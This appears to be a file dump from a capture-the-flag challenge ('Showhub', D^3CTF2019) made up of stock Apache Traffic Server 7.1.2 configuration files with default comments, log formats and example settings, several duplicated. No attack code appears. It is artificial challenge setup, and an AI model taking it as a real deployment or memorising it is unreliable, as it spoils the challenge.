 57 | --      Multiple collation hosts with some failover:
 58 | --        {'logs-1.example.com:4567', { 'logs-2.example.com:4567', 'logs-2a.example.com:4567'} }
 59 | 
 60 | -- Predefined variables.
 61 | --
 62 | -- log.roll.none (number)
 63 | --  RollingEnabled value to disable all log rolling.
 64 | --
 65 | -- log.roll.time (number)
 66 | --  RollingEnabled value. Roll at a certain time requency, specified
 67 | --  by RollingIntervalSec, and RollingOffsetHr.
 68 | --
 69 | -- log.roll.size (number)
 70 | --  RollingEnabled value. Roll when the size exceeds RollingSizeMb.
 71 | --
 72 | -- log.roll.both (number)
 73 | --  RollingEnabled value. Roll when either the specified rolling
 74 | --  time is reached or the specified file size is reached.
 75 | --
 76 | -- log.roll.any (number)
 77 | --  RollingEnabled value. Roll the log file when the specified
 78 | --  rolling time is reached if the size of the file equals or exceeds
 79 | --  the specified size.
 80 | --
 81 | -- log.protocol.http (number)
 82 | -- log.protocol.icp (number)
 83 | --  Server protocol constants for constructing %<etype> filters.
 84 | 
 85 | -- Removed parameters.
 86 | --
 87 | -- The following logging object parameters that were supported in
 88 | -- the XML configuration file have been removed.
 89 | --
 90 | -- Protocols:
 91 | --      The list of protocols to log is a comma separated list of the
 92 | --      protocols that the object logs.  If the log object has no
 93 | --      Protocol tag, then it logs all protocols. The Protocol tag
 94 | --      simply provides an easy way to create a filter that accepts
 95 | --      the specified protocols.
 96 | --
 97 | --      The log object Protocols parameter is no longer supported. This
 98 | --      parameter can be implemented with a filter on the %<etype> (log
 99 | --      entry type) log field, eg.
100 | --
101 | --      all = filter.accept(string.format('%%<etype> CONTAIN %d,%d', log.protocol.http, log.protocol.icp))
102 | --      icp_only = filter.accept(string.format('%%<etype> CONTAIN %d', log.protocol.icp))
103 | --      http_only = filter.accept(string.format('%%<etype> CONTAIN %d', log.protocol.http))
104 | --
105 | -- ServerHosts:
106 | --      This parameter provides an easy way to create a filter that logs
107 | --      only the requests to hosts in the comma separated list. Only entries
108 | --      from the named servers will be included in the log file. Servers
109 | --      can only be specified by name, not by IP address.
110 | --
111 | --      The log object ServerHosts parameter is no longer supported. It can
112 | --      implemented with a filter on the %<shn> (server host name) log
113 | --      field, eg.
114 | --
115 | --      hosts = filter.accept('%<shn> CASE_INSENSITIVE_CONTAIN host1,host2,host3,etc")
116 | 
117 | -- WebTrends Enhanced Log Format.
118 | --
119 | -- The following is compatible with the WebTrends Enhanced Log Format.
120 | -- If you want to generate a log that can be parsed by WebTrends
121 | -- reporting tools, simply create a log that uses this format.
122 | welf = format {
123 |   Format = 'id=firewall time="%<cqtd> %<cqtt>" fw=%<phn> pri=6 proto=%<cqus> duration=%<ttmsf> sent=%<psql> rcvd=%<cqhl> src=%<chi> dst=%<shi> dstname=%<shn> user=%<caun> op=%<cqhm> arg="%<cqup>" result=%<pssc> ref="%<{Referer}cqh>" agent="%<{user-agent}cqh>" cache=%<crc>'
124 | }
125 | 
126 | -- Squid Log Format with seconds resolution timestamp.
127 | --
128 | -- The following is the squid format but with a seconds-only timestamp
129 | -- (cqts) instead of a seconds and milliseconds timestamp (cqtq).
130 | squid_seconds_only_timestamp = format {
131 |   Format = '%<cqts> %<ttms> %<chi> %<crc>/%<pssc> %<psql> %<cqhm> %<cquc> %<caun> %<phr>/%<pqsn> %<psct>'
132 | }
133 | 
134 | -- Squid Log Format.
135 | squid = format {
136 |   Format = '%<cqtq> %<ttms> %<chi> %<crc>/%<pssc> %<psql> %<cqhm> %<cquc> %<caun> %<phr>/%<pqsn> %<psct>'
137 | }
138 | 
139 | -- Common Log Format.
140 | common = format {
141 |   Format = '%<chi> - %<caun> [%<cqtn>] "%<cqtx>" %<pssc> %<pscl>'
142 | }
143 | 
144 | -- Extended Log Format.
145 | extended = format {
146 |   Format = '%<chi> - %<caun> [%<cqtn>] "%<cqtx>" %<pssc> %<pscl> %<sssc> %<sscl> %<cqcl> %<pqcl> %<cqhl> %<pshl> %<pqhl> %<sshl> %<tts>'
147 | }
148 | 
149 | -- Extended2 Log Formats
150 | extended2 = format {
151 |   Format = '%<chi> - %<caun> [%<cqtn>] "%<cqtx>" %<pssc> %<pscl> %<sssc> %<sscl> %<cqcl> %<pqcl> %<cqhl> %<pshl> %<pqhl> %<sshl> %<tts> %<phr> %<cfsc> %<pfsc> %<crc>'
152 | }
153 | 
154 | log.binary {
155 |     Format = squid,
156 |     Filename = 'squid'
157 | }
158 | 
159 | -- vim: set ft=lua :
160 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/parent.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # parent.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/parent.config.en.html
 6 | #
 7 | # The purpose of this file is to specify the parent proxy for
 8 | #   specific objects or sets of objects
 9 | #
10 | # Each line consists of a set of tag value pairs.  The pairs
11 | #   are in the format  <tag>=<value>
12 | #
13 | # Each line must include exactly one primary specifier
14 | #
15 | #   Primary destination specifiers are
16 | #     dest_domain=
17 | #     dest_host=
18 | #     dest_ip=
19 | #     url_regex=
20 | #
21 | #
22 | # Lines may include any number of the secondary specifiers but
23 | #    secondary specifiers may not be duplicated on the same line
24 | #
25 | #   Secondary specifiers are
26 | #     port=
27 | #     scheme=
28 | #     prefix=
29 | #     suffix=
30 | #     method=
31 | #     time=
32 | #     src_ip=
33 | #     internal={true,false}
34 | #
35 | # Available parent directives are:
36 | #     parent=    (a semicolon separated list of parent proxies)
37 | #     go_direct={true,false}
38 | #     round_robin={strict,true,false}
39 | #
40 | # Note: for round_robin, strict means strict round_robin - parents are 
41 | #	tried one by one, true means round_robin based on client IP 
42 | #	addresses, false means no round_robin
43 | # 
44 | # Each line must include a parent= directive or a go_direct=
45 | #   directive.  If both appear, Traffic Server will directly
46 | #   contact the origin server if all the listed parent proxies 
47 | #   are down
48 | #    
49 | # Example
50 | #
51 | #  Alternate requests between proxy1 and proxy2
52 | #
53 | # dest_domain=.  parent="proxy1.example.com:8080; proxy2.example.com:8080"  round_robin=strict
54 | #
55 | #
56 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/parent.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # parent.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/parent.config.en.html
 6 | #
 7 | # The purpose of this file is to specify the parent proxy for
 8 | #   specific objects or sets of objects
 9 | #
10 | # Each line consists of a set of tag value pairs.  The pairs
11 | #   are in the format  <tag>=<value>
12 | #
13 | # Each line must include exactly one primary specifier
14 | #
15 | #   Primary destination specifiers are
16 | #     dest_domain=
17 | #     dest_host=
18 | #     dest_ip=
19 | #     url_regex=
20 | #
21 | #
22 | # Lines may include any number of the secondary specifiers but
23 | #    secondary specifiers may not be duplicated on the same line
24 | #
25 | #   Secondary specifiers are
26 | #     port=
27 | #     scheme=
28 | #     prefix=
29 | #     suffix=
30 | #     method=
31 | #     time=
32 | #     src_ip=
33 | #     internal={true,false}
34 | #
35 | # Available parent directives are:
36 | #     parent=    (a semicolon separated list of parent proxies)
37 | #     go_direct={true,false}
38 | #     round_robin={strict,true,false}
39 | #
40 | # Note: for round_robin, strict means strict round_robin - parents are 
41 | #	tried one by one, true means round_robin based on client IP 
42 | #	addresses, false means no round_robin
43 | # 
44 | # Each line must include a parent= directive or a go_direct=
45 | #   directive.  If both appear, Traffic Server will directly
46 | #   contact the origin server if all the listed parent proxies 
47 | #   are down
48 | #    
49 | # Example
50 | #
51 | #  Alternate requests between proxy1 and proxy2
52 | #
53 | # dest_domain=.  parent="proxy1.example.com:8080; proxy2.example.com:8080"  round_robin=strict
54 | #
55 | #
56 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/plugin.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # plugin.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/plugin.config.en.html
 6 | #
 7 | # Comments start with a '#' and continue to the end of the line
 8 | # Blank lines are ignored
 9 | #
10 | # test-plugin.so arg1 arg2 arg3
11 | #
12 | # Example:
13 | #inktomi/iwx/iwx.so
14 | #inktomi/abuse/abuse.so etc/trafficserver/abuse.config
15 | #inktomi/icx/icx.so etc/trafficserver/icx.config
16 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/plugin.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # plugin.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/plugin.config.en.html
 6 | #
 7 | # Comments start with a '#' and continue to the end of the line
 8 | # Blank lines are ignored
 9 | #
10 | # test-plugin.so arg1 arg2 arg3
11 | #
12 | # Example:
13 | #inktomi/iwx/iwx.so
14 | #inktomi/abuse/abuse.so etc/trafficserver/abuse.config
15 | #inktomi/icx/icx.so etc/trafficserver/icx.config
16 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/socks.config:
--------------------------------------------------------------------------------
 1 | #
 2 | #
 3 | # socks.config format:
 4 | # File consists of several lines. Each line can be a maximum of 400
 5 | # chars.
 6 | #
 7 | # We will not use SOCKS for addresses specified using no_socks.
 8 | # Any line whose first string is "no_socks" must be of the following
 9 | # format:
10 | # no_socks <comma separated list of IPADDRESS and/or IPADDRESS_RANGE>
11 | # IPADDRESS is x1.x2.x3.x4
12 | # IPADDRESS_RANGE is x1.x2.x3.x4 - y1.y2.y3.y4
13 | #
14 | 
15 | no_socks   123.14.15.1 - 123.14.17.4, 113.14.18.2
16 | no_socks   123.14.30.1 - 123.14.63.4, 122.43.15.2
17 | no_socks   123.14.84.1 - 123.14.89.4, 109.32.15.2
18 | 
19 | #
20 | # Authentication for SOCKS 5
21 | # We currently support Username/Password authentication
22 | # Format for username/password used by traffic_server when it connects to
23 | # the SOCKS server:
24 | #   auth u <user_name> <pasword>
25 | # The letter u says it is of type username/password. 
26 | # e.g:
27 | #   auth u traffic_server inktomi
28 | #
29 | # specifying multiple parents based on ip addresses
30 | #
31 | # specification is same as for parents (see parent.config and documentation
32 | # for parent.config).
33 | # The main differences:
34 | # 	This supports only "dest_ip" as the primary specifier
35 | #       This supports only "parent" and "round_robin" as the secondary specifiers
36 | #
37 | # examples:
38 | #
39 | # The following rule uses internal.exaple.com:1080 as the socks server all
40 | # destination addresses between 10.0.0.0 and 10.255.255.255
41 | #
42 | # dest_ip=10.0.0.0-10.255.255.255 parent="internal.example.com:1080"
43 | #
44 | # The following uses socks1 (at port 4080) and socks2 (at port 1080) alternately
45 | # (round-robin).
46 | #
47 | # dest_ip=216.32.0.0-216.32.255.255 parent="socks1:4080; socks2:1080" round_robin=strict
48 | #
49 | ########################################################################################
50 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/socks.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | #
 3 | # socks.config format:
 4 | # File consists of several lines. Each line can be a maximum of 400
 5 | # chars.
 6 | #
 7 | # We will not use SOCKS for addresses specified using no_socks.
 8 | # Any line whose first string is "no_socks" must be of the following
 9 | # format:
10 | # no_socks <comma separated list of IPADDRESS and/or IPADDRESS_RANGE>
11 | # IPADDRESS is x1.x2.x3.x4
12 | # IPADDRESS_RANGE is x1.x2.x3.x4 - y1.y2.y3.y4
13 | #
14 | 
15 | no_socks   123.14.15.1 - 123.14.17.4, 113.14.18.2
16 | no_socks   123.14.30.1 - 123.14.63.4, 122.43.15.2
17 | no_socks   123.14.84.1 - 123.14.89.4, 109.32.15.2
18 | 
19 | #
20 | # Authentication for SOCKS 5
21 | # We currently support Username/Password authentication
22 | # Format for username/password used by traffic_server when it connects to
23 | # the SOCKS server:
24 | #   auth u <user_name> <pasword>
25 | # The letter u says it is of type username/password. 
26 | # e.g:
27 | #   auth u traffic_server inktomi
28 | #
29 | # specifying multiple parents based on ip addresses
30 | #
31 | # specification is same as for parents (see parent.config and documentation
32 | # for parent.config).
33 | # The main differences:
34 | # 	This supports only "dest_ip" as the primary specifier
35 | #       This supports only "parent" and "round_robin" as the secondary specifiers
36 | #
37 | # examples:
38 | #
39 | # The following rule uses internal.exaple.com:1080 as the socks server all
40 | # destination addresses between 10.0.0.0 and 10.255.255.255
41 | #
42 | # dest_ip=10.0.0.0-10.255.255.255 parent="internal.example.com:1080"
43 | #
44 | # The following uses socks1 (at port 4080) and socks2 (at port 1080) alternately
45 | # (round-robin).
46 | #
47 | # dest_ip=216.32.0.0-216.32.255.255 parent="socks1:4080; socks2:1080" round_robin=strict
48 | #
49 | ########################################################################################
50 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/splitdns.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # splitdns.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/splitdns.config.en.html
 6 | #
 7 | # The purpose of this file is to specify the dns server for
 8 | #   specific objects or sets of objects.
 9 | #
10 | # Each line consists of a set of tag value pairs.  The pairs
11 | #   are in the format  <tag>=<value>. Please note that there
12 | #   should not be any spaces in the specifiers.
13 | # 
14 | # Each line must include exactly one primary specifier
15 | #
16 | #   Primary destination specifiers are
17 | #     dest_domain=
18 | #     dest_host=
19 | #     url_regex=
20 | #
21 | #
22 | # Available server directives are:
23 | # Required:
24 | #     named=       ( required; a DNS server; port may be included,
25 | #                    separated by ':'. If none provided, the default
26 | #                    port used is 53. Multiple DNS server may be 
27 | #                    specified, separated by spaces or ';'. The
28 | #                    DNS servers are required to be in ip address 
29 | #                    format )
30 | #
31 | # Optional:          
32 | #     def_domain=  ( optional;  when provided, only one default
33 | #                    may be listed on the line )
34 | #
35 | #     search_list= ( optional; however, if provided, requires at 
36 | #                    least one search domain. If an organization
37 | #                    has multiple zones, they may be specified, 
38 | #                    separated by spaces or ';'.  )
39 | # 
40 | # Each line must include at least a named= directive with an IP address
41 | # in the "dot" format. "def_domain=" and "search_list=" are optional.
42 | #
43 | # Additional notes:
44 | #
45 | # For improved performance, the system has a 'fast path', which is activated
46 | # when all the primary destination specifiers are of the type 
47 | # 'dest_domain' or 'dest_host'. It also requires that the number of rules
48 | # not exceed four (4). One of the side effect of this is, the first match
49 | # will terminate the search.
50 | #
51 | # If a host name is not fully qualified, i.e. does not have the domain 
52 | # specifier (ex. 'internal' instead of internal.example.com'), then
53 | # there is no rule using the primary destination specifier 'url_regex'. 
54 | #
55 | #    
56 | # Example:
57 | #
58 | #dest_domain=int.ik.com named="255.257..." def_domain="int.ik.com" search_list="int.ik.com mkt.ik.com"
59 | #dest_domain=!int.ik.com named="255.25..." def_domain="ik.com"
60 | 
61 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/splitdns.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # splitdns.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/splitdns.config.en.html
 6 | #
 7 | # The purpose of this file is to specify the dns server for
 8 | #   specific objects or sets of objects.
 9 | #
10 | # Each line consists of a set of tag value pairs.  The pairs
11 | #   are in the format  <tag>=<value>. Please note that there
12 | #   should not be any spaces in the specifiers.
13 | # 
14 | # Each line must include exactly one primary specifier
15 | #
16 | #   Primary destination specifiers are
17 | #     dest_domain=
18 | #     dest_host=
19 | #     url_regex=
20 | #
21 | #
22 | # Available server directives are:
23 | # Required:
24 | #     named=       ( required; a DNS server; port may be included,
25 | #                    separated by ':'. If none provided, the default
26 | #                    port used is 53. Multiple DNS server may be 
27 | #                    specified, separated by spaces or ';'. The
28 | #                    DNS servers are required to be in ip address 
29 | #                    format )
30 | #
31 | # Optional:          
32 | #     def_domain=  ( optional;  when provided, only one default
33 | #                    may be listed on the line )
34 | #
35 | #     search_list= ( optional; however, if provided, requires at 
36 | #                    least one search domain. If an organization
37 | #                    has multiple zones, they may be specified, 
38 | #                    separated by spaces or ';'.  )
39 | # 
40 | # Each line must include at least a named= directive with an IP address
41 | # in the "dot" format. "def_domain=" and "search_list=" are optional.
42 | #
43 | # Additional notes:
44 | #
45 | # For improved performance, the system has a 'fast path', which is activated
46 | # when all the primary destination specifiers are of the type 
47 | # 'dest_domain' or 'dest_host'. It also requires that the number of rules
48 | # not exceed four (4). One of the side effect of this is, the first match
49 | # will terminate the search.
50 | #
51 | # If a host name is not fully qualified, i.e. does not have the domain 
52 | # specifier (ex. 'internal' instead of internal.example.com'), then
53 | # there is no rule using the primary destination specifier 'url_regex'. 
54 | #
55 | #    
56 | # Example:
57 | #
58 | #dest_domain=int.ik.com named="255.257..." def_domain="int.ik.com" search_list="int.ik.com mkt.ik.com"
59 | #dest_domain=!int.ik.com named="255.25..." def_domain="ik.com"
60 | 
61 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/ssl_multicert.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # ssl_multicert.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/ssl_multicert.config.en.html
 6 | #
 7 | # Allows a TLS certificate and private key to be tied to a specific
 8 | # hostname or IP address. At load time, the certificate is parsed to
 9 | # extract the subject CN and all the DNS subjectAltNames.  The
10 | # certificate will be presented for connections requesting any of the
11 | # hostnames found in the certificate. Wildcard names in the certificates
12 | # are supported, but only of the form '*.domain.com', ie. where '*'
13 | # is the leftmost domain component.
14 | #
15 | # The certificate file path, CA path and key path specified in
16 | # records.config will be used for all certificates, CAs and keys
17 | # specified here.
18 | #
19 | # Fields:
20 | #
21 | # dest_ip=ADDRESS
22 | #   The IP (v4 or v6) address that the certificate should be presented
23 | #   on. This is now only used as a fallback in the case that the TLS
24 | #   SubjectNameIndication extension is not supported. If ADDRESS is
25 | #   '*', the certificate will be used as the default fallback if no
26 | #   other match can be made.
27 | #
28 | #   The address specified here can contain a port specifier, in which
29 | #   case the corresponding certificate will only match for connections
30 | #   accepted on the specified port. IPv6 addresses must be enclosed by
31 | #   square brackets if they have a port, eg, [::1]:80.
32 | #
33 | # ssl_key_name=FILENAME
34 | #   The name of the file containing the private key for this certificate.
35 | #   If the key is contained in the certificate file, this field can be
36 | #   omitted.
37 | #
38 | # ssl_ca_name=FILENAME
39 | #   If your certificates have different Certificate Authorities, you
40 | #   can optionally specify the corresponding file here.
41 | #
42 | # ssl_cert_name=FILENAME
43 | #   The name of the file containing the TLS certificate. This is the
44 | #   only field that is required to be present.
45 | #
46 | # ssl_key_dialog=[builtin|exec:/path/to/program]
47 | #   Method used to provide a pass phrase for encrypted private keys.
48 | #   Two options are supported: builtin and exec
49 | #     builtin - Requests passphrase via stdin/stdout. Useful for debugging.
50 | #     exec: - Executes a program and uses the stdout output for the pass
51 | #       phrase.
52 | #
53 | # action=[tunnel]
54 | #   If the tunnel matches this line, traffic server will not participate
55 | #   in the handshake.  But rather it will blind tunnel the SSL connection.
56 | #   If the connection is identified by server name, an openSSL patch must
57 | #   be applied to enable this functionality.  See TS-3006 for details.
58 | #
59 | # Examples:
60 | #   ssl_cert_name=foo.pem
61 | #   dest_ip=*	ssl_cert_name=bar.pem ssl_key_name=barKey.pem
62 | #   dest_ip=209.131.48.79	ssl_cert_name=server.pem ssl_key_name=serverKey.pem
63 | #   dest_ip=10.0.0.1:99 ssl_cert_name=port99.pem
64 | #   ssl_cert_name=foo.pem ssl_key_dialog="exec:/usr/bin/mypass foo 'ba r'"
65 | #   ssl_cert_name=foo.pem action=tunnel
66 | #   ssl_cert_name=wildcardcert.pem ssl_key_name=privkey.pem
67 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/ssl_multicert.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # ssl_multicert.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/ssl_multicert.config.en.html
 6 | #
 7 | # Allows a TLS certificate and private key to be tied to a specific
 8 | # hostname or IP address. At load time, the certificate is parsed to
 9 | # extract the subject CN and all the DNS subjectAltNames.  The
10 | # certificate will be presented for connections requesting any of the
11 | # hostnames found in the certificate. Wildcard names in the certificates
12 | # are supported, but only of the form '*.domain.com', ie. where '*'
13 | # is the leftmost domain component.
14 | #
15 | # The certificate file path, CA path and key path specified in
16 | # records.config will be used for all certificates, CAs and keys
17 | # specified here.
18 | #
19 | # Fields:
20 | #
21 | # dest_ip=ADDRESS
22 | #   The IP (v4 or v6) address that the certificate should be presented
23 | #   on. This is now only used as a fallback in the case that the TLS
24 | #   SubjectNameIndication extension is not supported. If ADDRESS is
25 | #   '*', the certificate will be used as the default fallback if no
26 | #   other match can be made.
27 | #
28 | #   The address specified here can contain a port specifier, in which
29 | #   case the corresponding certificate will only match for connections
30 | #   accepted on the specified port. IPv6 addresses must be enclosed by
31 | #   square brackets if they have a port, eg, [::1]:80.
32 | #
33 | # ssl_key_name=FILENAME
34 | #   The name of the file containing the private key for this certificate.
35 | #   If the key is contained in the certificate file, this field can be
36 | #   omitted.
37 | #
38 | # ssl_ca_name=FILENAME
39 | #   If your certificates have different Certificate Authorities, you
40 | #   can optionally specify the corresponding file here.
41 | #
42 | # ssl_cert_name=FILENAME
43 | #   The name of the file containing the TLS certificate. This is the
44 | #   only field that is required to be present.
45 | #
46 | # ssl_key_dialog=[builtin|exec:/path/to/program]
47 | #   Method used to provide a pass phrase for encrypted private keys.
48 | #   Two options are supported: builtin and exec
49 | #     builtin - Requests passphrase via stdin/stdout. Useful for debugging.
50 | #     exec: - Executes a program and uses the stdout output for the pass
51 | #       phrase.
52 | #
53 | # action=[tunnel]
54 | #   If the tunnel matches this line, traffic server will not participate
55 | #   in the handshake.  But rather it will blind tunnel the SSL connection.
56 | #   If the connection is identified by server name, an openSSL patch must
57 | #   be applied to enable this functionality.  See TS-3006 for details.
58 | #
59 | # Examples:
60 | #   ssl_cert_name=foo.pem
61 | #   dest_ip=*	ssl_cert_name=bar.pem ssl_key_name=barKey.pem
62 | #   dest_ip=209.131.48.79	ssl_cert_name=server.pem ssl_key_name=serverKey.pem
63 | #   dest_ip=10.0.0.1:99 ssl_cert_name=port99.pem
64 | #   ssl_cert_name=foo.pem ssl_key_dialog="exec:/usr/bin/mypass foo 'ba r'"
65 | #   ssl_cert_name=foo.pem action=tunnel
66 | #   ssl_cert_name=wildcardcert.pem ssl_key_name=privkey.pem
67 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/storage.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # storage.config - Storage Configuration file
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/storage.config.en.html
 6 | #
 7 | # The storage configuration is a list of all the storage to
 8 | # be used by the cache.
 9 | #
10 | #
11 | #############################################################
12 | # Using a file for the cache storage
13 | #
14 | # <pathname> <size>
15 | #
16 | # Where 'pathname' is full path to the directory where you want
17 | # the cache-file to live and 'size' is size in bytes
18 | #
19 | # Example: 128MB cache file(/opt/ts-712/var/trafficserver/cache.db)
20 | #      /opt/ts-712/var/trafficserver 128M
21 | #
22 | # Example: 144MB cache file(/opt/ts-712/var/trafficserver/cache.db)
23 | #          assuming prefix of '/opt/ts-712'
24 | #      var/trafficserver 150994944
25 | #
26 | # Example: 512MB cache file(/opt/ts-712/var/trafficserver/cache.db)
27 | #          assuming prefix of '/opt/ts-712'
28 | #      var/trafficserver 512M
29 | #
30 | #
31 | #############################################################
32 | ##              O_DIRECT Specific Configuration            ##
33 | #############################################################
34 | #
35 | # Examples: Using O_DIRECT on disks (Linux kernel >= 2.6.3,
36 | # FreeBSD > 5.3)
37 | #
38 | #      /dev/disc/by-id/[Insert_ID_Here_12345]         		# Linux
39 | #      /dev/disc/by-path/[Insert-Path-Here:12:34:56-1.0.0.0]	# Linux
40 | #
41 | #      /dev/ada1            					# FreeBSD
42 | #
43 | # Note that disks are identified by id or path. This is to prevent changes
44 | # by the kernel (which could occur if a disk was simply described as /dev/sda, sdb, etc.).
45 | #
46 | # Also note that when using these raw devices in O_DIRECT mode, you
47 | # do not need to specify the partition size. It's automatically
48 | # detected.
49 | #
50 | # A small default cache (256MB). This is set to allow for the regression test to succeed
51 | # most likely you'll want to use a larger cache. And, we definitely recommend the use
52 | # of raw devices for production caches.
53 | var/trafficserver 256M
54 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/storage.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # storage.config - Storage Configuration file
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/storage.config.en.html
 6 | #
 7 | # The storage configuration is a list of all the storage to
 8 | # be used by the cache.
 9 | #
10 | #
11 | #############################################################
12 | # Using a file for the cache storage
13 | #
14 | # <pathname> <size>
15 | #
16 | # Where 'pathname' is full path to the directory where you want
17 | # the cache-file to live and 'size' is size in bytes
18 | #
19 | # Example: 128MB cache file(/opt/ts-712/var/trafficserver/cache.db)
20 | #      /opt/ts-712/var/trafficserver 128M
21 | #
22 | # Example: 144MB cache file(/opt/ts-712/var/trafficserver/cache.db)
23 | #          assuming prefix of '/opt/ts-712'
24 | #      var/trafficserver 150994944
25 | #
26 | # Example: 512MB cache file(/opt/ts-712/var/trafficserver/cache.db)
27 | #          assuming prefix of '/opt/ts-712'
28 | #      var/trafficserver 512M
29 | #
30 | #
31 | #############################################################
32 | ##              O_DIRECT Specific Configuration            ##
33 | #############################################################
34 | #
35 | # Examples: Using O_DIRECT on disks (Linux kernel >= 2.6.3,
36 | # FreeBSD > 5.3)
37 | #
38 | #      /dev/disc/by-id/[Insert_ID_Here_12345]         		# Linux
39 | #      /dev/disc/by-path/[Insert-Path-Here:12:34:56-1.0.0.0]	# Linux
40 | #
41 | #      /dev/ada1            					# FreeBSD
42 | #
43 | # Note that disks are identified by id or path. This is to prevent changes
44 | # by the kernel (which could occur if a disk was simply described as /dev/sda, sdb, etc.).
45 | #
46 | # Also note that when using these raw devices in O_DIRECT mode, you
47 | # do not need to specify the partition size. It's automatically
48 | # detected.
49 | #
50 | # A small default cache (256MB). This is set to allow for the regression test to succeed
51 | # most likely you'll want to use a larger cache. And, we definitely recommend the use
52 | # of raw devices for production caches.
53 | var/trafficserver 256M
54 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/trafficserver-release:
--------------------------------------------------------------------------------
1 | <TS_VERSION> 7.1.2
2 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/vaddrs.config:
--------------------------------------------------------------------------------
 1 | # Virtual IP Address Configuration
 2 | #
 3 | # The purpose of this file is to specify virtual IP addresses
 4 | # for Traffic Server. This DOES NOT actually bind to these
 5 | # addresses; ATS either listens to all or the address specified
 6 | # through proxy.local.incoming_ip_to_bind.
 7 | #
 8 | # The vips specified here will be verified and broadcast across
 9 | # the cluster. Any conflicts will be logged as errors.
10 | #
11 | # In order to enable these checks you must also set:
12 | #     CONFIG proxy.config.vmap.enabled INT 1
13 | # In records.conf
14 | #
15 | # UNIX
16 | #   Format:
17 | #     <virtual IP address> <interface> <sub-interface>
18 | #
19 | #   Example:
20 | #     209.1.33.10 hme0 10
21 | #     209.1.33.11 hme0 11
22 | #
23 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/vaddrs.config_1:
--------------------------------------------------------------------------------
 1 | # Virtual IP Address Configuration
 2 | #
 3 | # The purpose of this file is to specify virtual IP addresses
 4 | # for Traffic Server. This DOES NOT actually bind to these
 5 | # addresses; ATS either listens to all or the address specified
 6 | # through proxy.local.incoming_ip_to_bind.
 7 | #
 8 | # The vips specified here will be verified and broadcast across
 9 | # the cluster. Any conflicts will be logged as errors.
10 | #
11 | # In order to enable these checks you must also set:
12 | #     CONFIG proxy.config.vmap.enabled INT 1
13 | # In records.conf
14 | #
15 | # UNIX
16 | #   Format:
17 | #     <virtual IP address> <interface> <sub-interface>
18 | #
19 | #   Example:
20 | #     209.1.33.10 hme0 10
21 | #     209.1.33.11 hme0 11
22 | #
23 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/volume.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # volume.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/volume.config.en.html
 6 | #
 7 | # This file specifies the various volumes, their sizes and the
 8 | # protocol they belong to. Use this file in conjunction with the
 9 | # hosting.config file.
10 | #
11 | #  Each line consists of a tag value pair.
12 | #    volume=<volume_number> scheme=<protocol_type> size=<volume_size>
13 | #
14 | #  volume_number can be any value between 1 and 255. 
15 | #  This limits the maximum number of volumes to 255. 
16 | #  Volume number 0 is reserved for the special free volume. 
17 | #  Each line MUST have a distinct volume number.
18 | #
19 | #  The only scheme currently supported is 'http.
20 | #
21 | #  volume_size can either be specified in percentage of the total
22 | #  cache space or absolute value. It must be a multiple of 128 Megabytes,
23 | #  with 128 Megabytes being the smallest size possible. If specified in 
24 | #  percentage, the size is rounded down to the closest multiple of 
25 | #  128 Megabytes. A volume can be as big as the whole cache. 
26 | #  Each volume is striped across several disks to 
27 | #  achieve parallel I/O. For example, if there are 4 disks, 
28 | #  a 1 Gigabyte volume will have 256 Megabytes on each
29 | #  disk (assuming each disk has enough free space available).
30 | #
31 | # To create one volume of size 10% of the total cache space and 
32 | # another 1 Gig  volume, 
33 | #  volume=1 scheme=http size=10%
34 | #  volume=2 scheme=http size=1024
35 | 


--------------------------------------------------------------------------------
